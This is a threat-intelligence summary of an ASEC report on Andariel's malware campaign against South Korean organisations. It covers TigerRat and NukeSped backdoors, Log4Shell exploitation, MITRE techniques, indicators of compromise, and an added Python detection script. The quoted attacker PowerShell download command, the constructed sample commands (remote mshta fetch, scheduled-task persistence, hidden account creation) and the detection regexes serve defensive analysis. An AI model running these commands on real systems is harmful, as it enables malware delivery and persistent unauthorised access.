The article traces the Andariel group’s malware campaign distributed via an asset management program, tying the group to Lazarus and detailing their use of Log4Shell and other vulnerabilities to attack South Korean targets. It also covers the Go-based downloader, multiple backdoors (TigerRat, Lilith RAT, Black RAT, NukeSped variants), MS-SQL Server exploitation, and persistence techniques such as scheduled tasks and concealed user accounts.
#AndarielGroup #TigerRat
Keypoints
- Andariel is linked to Lazarus and has shifted toward financially motivated attacks in addition to information gathering.
- Initial access often involves spear phishing, watering hole, or supply chain attacks, with cases exploiting a central management solution.
- Recent activity includes exploiting Log4Shell and vulnerabilities in Innorix Agent to target South Korean sectors.
- An asset management program was used in the latest operation, alongside attacks against poorly managed MS-SQL servers.
- Malware deployed includes TigerRat, NukeSped variants, Black RAT, and Lilith RAT (open-source), plus a Go-based downloader.
- Post-infection actions include privilege escalation (PrintSpoofer), creating concealed user accounts, persistence via scheduled tasks, and credential discovery with NirSoft tools.
- Security guidance emphasizes patching, monitoring asset management software, and updating security products to detect and block these threats.
MITRE Techniques
- [T1566.001] Phishing – Used spear phishing as an initial access method. “[The Andariel group usually launches spear phishing, watering hole, or supply chain attacks for initial penetration.]”
- [T1195] Supply Chain Compromise – Attack via an asset management program used to distribute malware. “[Andariel group distributing malware via an attack using a certain asset management program.]”
- [T1203] Exploitation for Client Execution – Exploited vulnerabilities such as Log4Shell to attack targets. “[exploiting vulnerabilities in many programs such as Log4Shell and Innorix Agent to attack targets in various corporate sectors…]”
- [T1110] Brute Force – Targeted poorly managed MS-SQL servers with credentials vulnerable to brute force/dictionary attacks. “[the threat actor attacked poorly managed MS-SQL servers and installed NukeSped… vulnerable against brute force or dictionary attacks]”
- [T1059.001] PowerShell – Downloaded malware using a PowerShell command. “[PowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe]”
- [T1218.005] Signed Binary Proxy Execution – Used the mshta.exe process to download malware. “[the group also used the mshta.exe process to download malware.]”
- [T1053.005] Scheduled Task – Maintained persistence by registering tasks in Task Scheduler. “[ran the following commands and registered them to the task scheduler to maintain persistence.]”
- [T1003] Credential Dumping – Used NirSoft tools to reveal saved credentials for lateral movement. “[NirSoft’s CredentialsFileView and Network Password Recovery… can be used in the future for lateral movement within the organization’s network]”
- [T1136.001] Create Account – Added a hidden user account for persistence and GUI access. “[the threat actor also added a user account in the system and concealed it.]”
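The post-infection commands listed above (a PowerShell download into C:\Users\public, mshta.exe fetching a remote file, a scheduled task pointing at that drop directory, and a new local account) are easy to hunt for in process-creation telemetry. The following detection script is an added example written for this summary, not code from the ASEC article; the sample events are constructed, and the IP addresses in them are documentation-range placeholders rather than the article's indicators.

```python
import re

# Constructed process-creation records (image name, command line). The drop path and
# download pattern mirror the article's commands; the IPs are placeholders, not real C2.
SAMPLE_EVENTS = [
    ("powershell.exe",
     r"powershell wget http://203.0.113.10:8585/load.png -outfile C:\Users\public\credis.exe"),
    ("mshta.exe", "mshta.exe http://203.0.113.20:6099/fav.ico"),
    ("schtasks.exe",
     r'schtasks /create /sc minute /mo 1 /tn "credis" /tr C:\Users\public\credis.exe'),
    ("net.exe", "net user svc_backup P@ssw0rd! /add"),
    ("powershell.exe", "powershell Get-Process | Sort-Object CPU"),  # benign, must not fire
]

# User-writable drop locations: C:\Users\public from the article plus common equivalents.
# Used inside case-insensitive regexes, so a single regex backslash is written as \\.
DROP_DIRS = r"(?:users\\public|programdata|\\temp\\|appdata\\local\\temp)"

# Each rule is (name, compiled regex over the command line). wget, curl and iwr are the
# built-in PowerShell aliases of Invoke-WebRequest, so all four spellings are covered.
RULES = [
    ("powershell_download_to_public",
     re.compile(r"\b(?:wget|curl|iwr|invoke-webrequest)\b.*https?://.*-outfile\s+\S*"
                + DROP_DIRS, re.I)),
    ("mshta_remote_url", re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.I)),
    ("schtasks_create_from_drop_dir",
     re.compile(r"\bschtasks\b.*/create\b.*/tr\s+\S*" + DROP_DIRS, re.I)),
    ("local_account_added",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\s+\S+.*\s/add\b", re.I)),
]


def scan(events):
    """Return (rule_name, image, command_line) for every rule that fires on each event."""
    hits = []
    for image, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((name, image, cmdline))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Feed it real Sysmon Event ID 1 or Windows 4688 command lines instead of the constructed list; a hit on the first rule followed within minutes by the third is the sequence the article describes.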
Indicators of Compromise
- [IP Address] context – 109.248.150[.]147:443, 27.102.115[.]207:8088, and 2 more items
- [MD5 Hash] context – 13b4ce1fc26d400d34ede460a8530d93: TigerRat (credisvs.exe, credis.exe), 41895c5416fdc82f7e0babc6bb6c7216: TigerRat (credis.exe)
- [URL] context – hxxp://109.248.150[.]147:8585/load.png, hxxp://27.102.118[.]204:6099/fav.ico
- [File Name] context – credis.exe, mltest.exe, and 2 more file names
- [C2 URL] context – 84.38.132[.]67:8443, 109.248.150[.]147:8443
Read more: https://asec.ahnlab.com/en/59073/